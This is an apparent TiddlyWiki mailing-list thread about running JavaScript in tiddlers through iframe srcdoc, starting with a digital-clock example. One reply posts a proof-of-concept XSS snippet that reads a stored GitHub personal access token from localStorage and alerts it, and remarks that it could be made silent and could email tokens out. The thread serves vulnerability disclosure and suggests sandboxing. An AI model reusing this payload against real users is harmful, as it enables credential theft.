It kind of sounds like the iFrame element should then be outright eliminated from the web entirely.
That might be problematic. Re security, couldn't any tiddler that is a javascript macro be altered for nefarious purposes just as easily as injecting malicious javascript into an iFrame? On Monday, August 16, 2021 at 12:39:41 PM UTC-3 flanc...@gmail.com wrote: > This seems EXTREMELY INSECURE. What is to stop an attacker from injecting > malicious JS into a tiddler, regardless of whether it is "sandboxed". > Paste this Proof-of-Concept into a blank tiddler. What it does it steals > your GitHub PAT if you have it configured, and alerts it to you. While I > have not done it here, I could easily make it both invisible and have it > email me the PAT's it gathers. > > CODE: > <$vars vSrcDoc={{{ [[<body> <div > id="clockDiv"></div><script>document.getElementById('clockDiv').innerHTML = > `<a id="xss" href="javascript:alert('Your GitHub Token > is:'+localStorage.getItem('tw5-password-github')+'. If it is blank, you > probably don\\'t have TW GitHub saving configured');"></a>`; > document.getElementById('xss').click();</script></body>]] }}}> > <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe> > </$vars> > > Long-story-short, an attacker can easily bypass any sanitation TW employs, > and harvest credentials from various sites. It is my belief that this issue > needs to be fixed immediately, and brought to the attention of Jeremy and > other devs. > > I would be happy to help on the repair process. I have some experience > with PenTesting and fixing XSS vulnerabilities (mainly in my own > applications). I would recommend adding a listener to TW changes, and > checking for an iframe code. If it does contain this, TW should add a > sandbox constraint on it ( > https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox > ) > > On Monday, August 16, 2021 at 10:55:46 AM UTC-4 cj.v...@gmail.com wrote: > >> Updated one of the tiddlers in the JSON package. New version attached. >> >> The addition highlighted below: >> >> <body> >> <div id="clockDiv"></div> >> <script> >> *document.oncontextmenu = function() { * >> * return false; * >> *};* >> let clockEl = document.getElementById("clockDiv"); >> ... >> >> The reason for the added code: block access to the back button in the >> iFrame (by blocking access to the entire menu), which winds up performing >> the back button operation on the entire browser page. >> On Sunday, August 15, 2021 at 11:27:41 PM UTC-3 Charlie Veniot wrote: >> >>> I don't know what made me think of this. >>> >>> In case this has not been brought up in a while (I doubt this is new to >>> seasoned folk) ... >>> >>> I was thinking: could I use an iFrame to include simple javascript in a >>> tiddler without getting into macros or plugins that enable javascript. >>> >>> And, if I could, then could I set things up so that the iFrame is >>> showing javascript dynamically created by the tiddler ? >>> >>> So here is a way to show a digital clock in TiddlyWiki, for >>> non-programmers who just want to copy and paste javascript code from the >>> web without figuring out how the javascript code works : >>> >>> Put this in a brand new tiddler: >>> >>> *<$vars* *vSrcDoc*={{{ [[<body> <div id="clockDiv"></div> <script> >>> let clockEl = document.getElementById("clockDiv"); function >>> getClockTime() { let date = new Date(); let hr = >>> date.getHours(); let min = date.getMinutes(); let sec = >>> date.getSeconds(); hr = ("0" + hr).slice(-2); min = ("0" + >>> min).slice(-2); sec = ("0" + sec).slice(-2); clockEl.innerHTML = >>> `${hr}:${min}:${sec}`; } setInterval(getClockTime, 1000); >>> </script></body>]] }}}*>* >>> *<iframe* srcdoc=*<<vSrcDoc>>* style="border:none;width:100%;" >>> *></iframe>* >>> *</$vars>* >>> >>> Sneaky sneaky, has me wondering what kind of other fun things could be >>> done... >>> >> -- You received this message because you are subscribed to the Google Groups "TiddlyWiki" group. To unsubscribe from this group and stop receiving emails from it, send an email to tiddlywiki+unsubscr...@googlegroups.com. To view this discussion on the web visit https://groups.google.com/d/msgid/tiddlywiki/f03f0c64-d6b0-471c-9e6b-4c581498d733n%40googlegroups.com.